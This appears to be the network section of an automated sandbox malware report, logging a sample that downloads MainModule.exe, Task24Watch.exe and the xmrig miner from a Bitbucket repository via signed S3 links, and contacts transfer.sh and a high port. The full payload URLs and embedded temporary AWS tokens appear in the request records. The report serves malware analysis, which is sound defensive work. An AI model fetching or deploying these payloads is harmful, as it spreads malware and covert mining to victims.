Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
bitbucket.org | 104.192.141.1 | |
bbuseruploads.s3.amazonaws.com | CNAME s3-1-w.amazonaws.com | 52.217.206.129 |
transfer.sh | 144.76.136.153 | |
- TCP Requests
  - 192.168.56.103:49169 104.192.141.1:443 bitbucket.org
  - 192.168.56.103:49181 104.192.141.1:443 bitbucket.org
  - 192.168.56.103:49209 104.192.141.1:443 bitbucket.org
  - 192.168.56.103:49172 144.76.136.153:443 transfer.sh
  - 192.168.56.103:49166 168.119.228.126:11552
  - 192.168.56.103:49170 52.216.212.249:443 bbuseruploads.s3.amazonaws.com
  - 192.168.56.103:49210 52.217.40.228:443 bbuseruploads.s3.amazonaws.com
  - 192.168.56.103:49182 54.231.132.1:443 bbuseruploads.s3.amazonaws.com
- UDP Requests
  - 192.168.56.103:50800 164.124.101.2:53
  - 192.168.56.103:52760 164.124.101.2:53
  - 192.168.56.103:64894 164.124.101.2:53
  - 192.168.56.103:137 192.168.56.255:137
  - 192.168.56.103:138 192.168.56.255:138
  - 192.168.56.103:49154 239.255.255.250:1900
  - 8.8.8.8:53 192.168.56.103:53673
  - 8.8.8.8:53 192.168.56.103:56613
  - 8.8.8.8:53 192.168.56.103:62576
  - 8.8.8.8:53 192.168.56.103:64894
GET 302 https://bitbucket.org/rpoverka/zhopa/downloads/MainModule.exe

REQUEST
GET /rpoverka/zhopa/downloads/MainModule.exe HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive

RESPONSE
HTTP/1.1 302 Found
content-security-policy-report-only: base-uri 'self'; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com stats.g.doubleclick.net sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
server: envoy
x-usage-quota-remaining: 999303.105
vary: Accept-Language, Origin
x-usage-request-cost: 866.27
cache-control: max-age=0, no-cache, no-store, must-revalidate
Content-Type: text/html; charset=utf-8
x-b3-traceid: 408aa5e47f821a94
x-usage-output-ops: 0
x-used-mesh: False
x-dc-location: Micros-3
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Tue, 21 Feb 2023 04:33:08 GMT
x-usage-user-time: 0.025988
x-usage-system-time: 0.000000
location: https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/09293685-2c5d-4159-86d9-08c57e8e8de5/MainModule.exe?response-content-disposition=attachment%3B%20filename%3D%22MainModule.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHLH2DZ7U&Signature=VFctTT15Oy1pCiaL50jPJ9FZjcw%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDDlI4D0qJzDCLyV4sCK%2BATydA3JWrOh0cMOubezBVsXQR%2FU%2FxdqqCLfVyEmUqPgTWhLBPz5Zr5czddzsszsXHFjm1b9fwf0uSHkEq4y2CN6%2FZUsbdan4z2fd%2BjyC1AMdnaLr8W2WfpqEeTejTc9MrV1ptPEmwh%2BBAfQqD9A181S7BqhEy%2FzCiyvgPI8AQX2OJWvVbkdii83pzDQX6IWqUeaNaDx1vvVHQxH8tKUVPDiuO866bid5YIcvKCQpUgEJQXfHf9aZ%2BIlfNUYYjEko3Y7RnwYyLcKnJ4pxJmRnLWX47kqvK7YZM5DPIMVEnGMVLokXa6L%2BO%2FHbDJlhZEVB96P2tA%3D%3D&Expires=1676955237
expires: Tue, 21 Feb 2023 04:33:08 GMT
x-served-by: 10bd9f68300c
x-envoy-upstream-service-time: 618
content-language: en
x-view-name: bitbucket.apps.downloads.views.download_file
x-static-version: 7676b48801ad
x-render-time: 0.48598599433898926
Connection: keep-alive
x-usage-input-ops: 0
x-frame-options: SAMEORIGIN
x-version: 7676b48801ad
x-request-count: 3126
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 0
GET 200 https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/09293685-2c5d-4159-86d9-08c57e8e8de5/MainModule.exe?response-content-disposition=attachment%3B%20filename%3D%22MainModule.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHLH2DZ7U&Signature=VFctTT15Oy1pCiaL50jPJ9FZjcw%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDDlI4D0qJzDCLyV4sCK%2BATydA3JWrOh0cMOubezBVsXQR%2FU%2FxdqqCLfVyEmUqPgTWhLBPz5Zr5czddzsszsXHFjm1b9fwf0uSHkEq4y2CN6%2FZUsbdan4z2fd%2BjyC1AMdnaLr8W2WfpqEeTejTc9MrV1ptPEmwh%2BBAfQqD9A181S7BqhEy%2FzCiyvgPI8AQX2OJWvVbkdii83pzDQX6IWqUeaNaDx1vvVHQxH8tKUVPDiuO866bid5YIcvKCQpUgEJQXfHf9aZ%2BIlfNUYYjEko3Y7RnwYyLcKnJ4pxJmRnLWX47kqvK7YZM5DPIMVEnGMVLokXa6L%2BO%2FHbDJlhZEVB96P2tA%3D%3D&Expires=1676955237

REQUEST
GET /92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/09293685-2c5d-4159-86d9-08c57e8e8de5/MainModule.exe?response-content-disposition=attachment%3B%20filename%3D%22MainModule.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHLH2DZ7U&Signature=VFctTT15Oy1pCiaL50jPJ9FZjcw%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDDlI4D0qJzDCLyV4sCK%2BATydA3JWrOh0cMOubezBVsXQR%2FU%2FxdqqCLfVyEmUqPgTWhLBPz5Zr5czddzsszsXHFjm1b9fwf0uSHkEq4y2CN6%2FZUsbdan4z2fd%2BjyC1AMdnaLr8W2WfpqEeTejTc9MrV1ptPEmwh%2BBAfQqD9A181S7BqhEy%2FzCiyvgPI8AQX2OJWvVbkdii83pzDQX6IWqUeaNaDx1vvVHQxH8tKUVPDiuO866bid5YIcvKCQpUgEJQXfHf9aZ%2BIlfNUYYjEko3Y7RnwYyLcKnJ4pxJmRnLWX47kqvK7YZM5DPIMVEnGMVLokXa6L%2BO%2FHbDJlhZEVB96P2tA%3D%3D&Expires=1676955237 HTTP/1.1
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive

RESPONSE
HTTP/1.1 200 OK
x-amz-id-2: ZixwJfCa2JbaEUglxxFtXxoX4cqzjoJIbHFG9zJL3CtGHTR+wFvDT30RvaS8zTCdwoiWvaLROtQ=
x-amz-request-id: H9XGYTKDCAGJQKC6
Date: Tue, 21 Feb 2023 04:33:10 GMT
Last-Modified: Thu, 16 Feb 2023 12:57:54 GMT
ETag: "34b13de397e2d25f22dd9de0acf26d96"
x-amz-server-side-encryption: AES256
x-amz-version-id: KovB6eLABpfhjlzRV4BF4eHt4rQb0noc
Content-Disposition: attachment; filename="MainModule.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Server: AmazonS3
Content-Length: 64000
GET 302 https://bitbucket.org/rpoverka/zhopa/downloads/Task24Watch.exe

REQUEST
GET /rpoverka/zhopa/downloads/Task24Watch.exe HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive

RESPONSE
HTTP/1.1 302 Found
content-security-policy-report-only: base-uri 'self'; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com stats.g.doubleclick.net sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
server: envoy
x-usage-quota-remaining: 998982.902
vary: Accept-Language, Origin
x-usage-request-cost: 1030.60
cache-control: max-age=0, no-cache, no-store, must-revalidate
Content-Type: text/html; charset=utf-8
x-b3-traceid: a2c1697924f08b4d
x-usage-output-ops: 0
x-used-mesh: False
x-dc-location: Micros-3
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Tue, 21 Feb 2023 04:33:17 GMT
x-usage-user-time: 0.021893
x-usage-system-time: 0.009025
location: https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/03f126aa-6017-4520-92a2-c8112a6addd7/Task24Watch.exe?response-content-disposition=attachment%3B%20filename%3D%22Task24Watch.exe%22&AWSAccessKeyId=ASIA6KOSE3BNDUXZPH56&Signature=avwBuxkhd4Xgyixj2PMoYGET0Cg%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDEMf0%2F1ULRFra9C9SSK%2BAbVGxqOnGdvkQMEFBU0%2FF5kg6%2F4%2B0yBwTTPvUtiH8w9tjKMGuLIxouTSkyQPrmjHeqIuFXZoArYMHNan31MSIqcqQKgid1H5NS8ddkcKVW%2BhLj3OrmzhfPqif6CPZl1d6fUMX6wNPUdFX9ck2y7y2tn%2FGpmOAG2M5LDLEVeKC6yW1z5uxNT3isa69%2FTZk1uGwRJuKOV%2BvKyorHoxEf9ndewrbcqH4XNC38rhiWOPr9jrq5IEKnCVSHKkGvwUvSYo64%2FRnwYyLQEHG3flYspuy3K0djwJevY7Qp07PgKYmJk9mkBYg1wuoNRORGhmYCzHwiDmaw%3D%3D&Expires=1676955379
expires: Tue, 21 Feb 2023 04:33:17 GMT
x-served-by: 10bd9f68300c
x-envoy-upstream-service-time: 56
content-language: en
x-view-name: bitbucket.apps.downloads.views.download_file
x-static-version: 7676b48801ad
x-render-time: 0.047059059143066406
Connection: keep-alive
x-usage-input-ops: 0
x-frame-options: SAMEORIGIN
x-version: 7676b48801ad
x-request-count: 3378
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 0
GET 200 https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/03f126aa-6017-4520-92a2-c8112a6addd7/Task24Watch.exe?response-content-disposition=attachment%3B%20filename%3D%22Task24Watch.exe%22&AWSAccessKeyId=ASIA6KOSE3BNDUXZPH56&Signature=avwBuxkhd4Xgyixj2PMoYGET0Cg%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDEMf0%2F1ULRFra9C9SSK%2BAbVGxqOnGdvkQMEFBU0%2FF5kg6%2F4%2B0yBwTTPvUtiH8w9tjKMGuLIxouTSkyQPrmjHeqIuFXZoArYMHNan31MSIqcqQKgid1H5NS8ddkcKVW%2BhLj3OrmzhfPqif6CPZl1d6fUMX6wNPUdFX9ck2y7y2tn%2FGpmOAG2M5LDLEVeKC6yW1z5uxNT3isa69%2FTZk1uGwRJuKOV%2BvKyorHoxEf9ndewrbcqH4XNC38rhiWOPr9jrq5IEKnCVSHKkGvwUvSYo64%2FRnwYyLQEHG3flYspuy3K0djwJevY7Qp07PgKYmJk9mkBYg1wuoNRORGhmYCzHwiDmaw%3D%3D&Expires=1676955379

REQUEST
GET /92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/03f126aa-6017-4520-92a2-c8112a6addd7/Task24Watch.exe?response-content-disposition=attachment%3B%20filename%3D%22Task24Watch.exe%22&AWSAccessKeyId=ASIA6KOSE3BNDUXZPH56&Signature=avwBuxkhd4Xgyixj2PMoYGET0Cg%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDEMf0%2F1ULRFra9C9SSK%2BAbVGxqOnGdvkQMEFBU0%2FF5kg6%2F4%2B0yBwTTPvUtiH8w9tjKMGuLIxouTSkyQPrmjHeqIuFXZoArYMHNan31MSIqcqQKgid1H5NS8ddkcKVW%2BhLj3OrmzhfPqif6CPZl1d6fUMX6wNPUdFX9ck2y7y2tn%2FGpmOAG2M5LDLEVeKC6yW1z5uxNT3isa69%2FTZk1uGwRJuKOV%2BvKyorHoxEf9ndewrbcqH4XNC38rhiWOPr9jrq5IEKnCVSHKkGvwUvSYo64%2FRnwYyLQEHG3flYspuy3K0djwJevY7Qp07PgKYmJk9mkBYg1wuoNRORGhmYCzHwiDmaw%3D%3D&Expires=1676955379 HTTP/1.1
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive

RESPONSE
HTTP/1.1 200 OK
x-amz-id-2: G2ILWJnysuxnhPRQnbHyvuSuM0T76VZ2R09HUZlubLhmM6b0Le5jtBn9uImrkStcIt3hm1UtDC8=
x-amz-request-id: AJFB7M1B4X2Y6CSW
Date: Tue, 21 Feb 2023 04:33:18 GMT
Last-Modified: Thu, 16 Feb 2023 12:55:55 GMT
ETag: "acf4152befc5768daaf11c92fd3899b0"
x-amz-server-side-encryption: AES256
x-amz-version-id: LTRtxqABDUvJvdVyXIh5.wpjrb_ZMyLA
Content-Disposition: attachment; filename="Task24Watch.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Server: AmazonS3
Content-Length: 25088
GET 302 https://bitbucket.org/rpoverka/zhopa/downloads/xmrig.exe

REQUEST
GET /rpoverka/zhopa/downloads/xmrig.exe HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive

RESPONSE
HTTP/1.1 302 Found
content-security-policy-report-only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com stats.g.doubleclick.net sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; object-src 'none'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
server: envoy
x-usage-quota-remaining: 999078.046
vary: Accept-Language, Origin
x-usage-request-cost: 936.47
cache-control: max-age=0, no-cache, no-store, must-revalidate
Content-Type: text/html; charset=utf-8
x-b3-traceid: 5a5f47b57fe7862a
x-usage-output-ops: 0
x-used-mesh: False
x-dc-location: Micros-3
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Tue, 21 Feb 2023 04:33:39 GMT
x-usage-user-time: 0.028094
x-usage-system-time: 0.000000
location: https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/b3a0e12f-e350-4a5c-8239-1cb38b0ef068/xmrig.exe?response-content-disposition=attachment%3B%20filename%3D%22xmrig.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJFRFBCRB&Signature=Igv5ADbIOFzJ%2FL1GdVUwoZJ1ANQ%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDGmgGod9JRtPIJ5J4iK%2BAZ%2BQf48tgsYZfpo4Jv0ino2j8ZYKs9z3%2F4NzmPnRh8UjeASue%2FAqqStw1rcdJ1Q4OZPvB9TxKnagXZ4zUSHd%2BMoCmzQTTS%2FEJ4X7Jet0ittMt%2BwyEeZlQpBVreTLIyHR7YL9OLNMvuZ%2BNo5LL4F%2FYZiU5tAhJG9ymJHifuKiVUG%2F7ws5w%2BEtN6zXSPHZgF0ke%2BCfYANSVAaxz9nGIdD4w2EDsUUiZP%2BdvKALJrgY19BYakB2ZKockBrXLbvh4XoonJDRnwYyLaJSIHYriwNaDqOPi%2FmZw7OZUkogXNtLqHRkzUkMTDnv8aSn%2BZV7kaEstYBcdg%3D%3D&Expires=1676955428
expires: Tue, 21 Feb 2023 04:33:39 GMT
x-served-by: 22360fed4cf9
x-envoy-upstream-service-time: 60
content-language: en
x-view-name: bitbucket.apps.downloads.views.download_file
x-static-version: 7676b48801ad
x-render-time: 0.04874062538146973
Connection: keep-alive
x-usage-input-ops: 0
x-frame-options: SAMEORIGIN
x-version: 7676b48801ad
x-request-count: 3239
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 0
GET 200 https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/b3a0e12f-e350-4a5c-8239-1cb38b0ef068/xmrig.exe?response-content-disposition=attachment%3B%20filename%3D%22xmrig.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJFRFBCRB&Signature=Igv5ADbIOFzJ%2FL1GdVUwoZJ1ANQ%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDGmgGod9JRtPIJ5J4iK%2BAZ%2BQf48tgsYZfpo4Jv0ino2j8ZYKs9z3%2F4NzmPnRh8UjeASue%2FAqqStw1rcdJ1Q4OZPvB9TxKnagXZ4zUSHd%2BMoCmzQTTS%2FEJ4X7Jet0ittMt%2BwyEeZlQpBVreTLIyHR7YL9OLNMvuZ%2BNo5LL4F%2FYZiU5tAhJG9ymJHifuKiVUG%2F7ws5w%2BEtN6zXSPHZgF0ke%2BCfYANSVAaxz9nGIdD4w2EDsUUiZP%2BdvKALJrgY19BYakB2ZKockBrXLbvh4XoonJDRnwYyLaJSIHYriwNaDqOPi%2FmZw7OZUkogXNtLqHRkzUkMTDnv8aSn%2BZV7kaEstYBcdg%3D%3D&Expires=1676955428

REQUEST
GET /92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/b3a0e12f-e350-4a5c-8239-1cb38b0ef068/xmrig.exe?response-content-disposition=attachment%3B%20filename%3D%22xmrig.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJFRFBCRB&Signature=Igv5ADbIOFzJ%2FL1GdVUwoZJ1ANQ%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDGmgGod9JRtPIJ5J4iK%2BAZ%2BQf48tgsYZfpo4Jv0ino2j8ZYKs9z3%2F4NzmPnRh8UjeASue%2FAqqStw1rcdJ1Q4OZPvB9TxKnagXZ4zUSHd%2BMoCmzQTTS%2FEJ4X7Jet0ittMt%2BwyEeZlQpBVreTLIyHR7YL9OLNMvuZ%2BNo5LL4F%2FYZiU5tAhJG9ymJHifuKiVUG%2F7ws5w%2BEtN6zXSPHZgF0ke%2BCfYANSVAaxz9nGIdD4w2EDsUUiZP%2BdvKALJrgY19BYakB2ZKockBrXLbvh4XoonJDRnwYyLaJSIHYriwNaDqOPi%2FmZw7OZUkogXNtLqHRkzUkMTDnv8aSn%2BZV7kaEstYBcdg%3D%3D&Expires=1676955428 HTTP/1.1
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive

RESPONSE
HTTP/1.1 200 OK
x-amz-id-2: ouRJ7UoWlOBLsYo6hjOmBb4S3EbNBmGFsdi5OzUX7SJvGHSlcdl4onpE6yE8BlGGAn4kN9ZKyJI=
x-amz-request-id: 1S4T14V8ZGF6SFEZ
Date: Tue, 21 Feb 2023 04:33:41 GMT
Last-Modified: Thu, 16 Feb 2023 12:56:44 GMT
ETag: "6c454e10bbea489cfc96253fe55ec282"
x-amz-server-side-encryption: AES256
x-amz-version-id: F_.ySUKVb296RAW45ELrPoA1P..Dfu7X
Content-Disposition: attachment; filename="xmrig.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Server: AmazonS3
Content-Length: 5402112
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49170 52.216.212.249:443 | C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=*.s3.amazonaws.com | ec:b2:cb:26:56:49:75:2a:47:ef:84:49:5a:ca:b7:a5:b3:48:78:2b |
TLS 1.2 192.168.56.103:49209 104.192.141.1:443 | C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | unknown=US, unknown=Delaware, unknown=Private Organization, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., CN=bitbucket.org | 7d:81:14:7c:39:c5:20:46:2f:43:d4:e8:61:e5:8f:c2:ac:3a:63:cc |
TLS 1.2 192.168.56.103:49169 104.192.141.1:443 | C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | unknown=US, unknown=Delaware, unknown=Private Organization, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., CN=bitbucket.org | 7d:81:14:7c:39:c5:20:46:2f:43:d4:e8:61:e5:8f:c2:ac:3a:63:cc |
TLS 1.2 192.168.56.103:49181 104.192.141.1:443 | C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | unknown=US, unknown=Delaware, unknown=Private Organization, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., CN=bitbucket.org | 7d:81:14:7c:39:c5:20:46:2f:43:d4:e8:61:e5:8f:c2:ac:3a:63:cc |
TLS 1.2 192.168.56.103:49182 54.231.132.1:443 | C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=*.s3.amazonaws.com | ec:b2:cb:26:56:49:75:2a:47:ef:84:49:5a:ca:b7:a5:b3:48:78:2b |
TLS 1.2 192.168.56.103:49210 52.217.40.228:443 | C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=*.s3.amazonaws.com | ec:b2:cb:26:56:49:75:2a:47:ef:84:49:5a:ca:b7:a5:b3:48:78:2b |
Snort Alerts
No Snort Alerts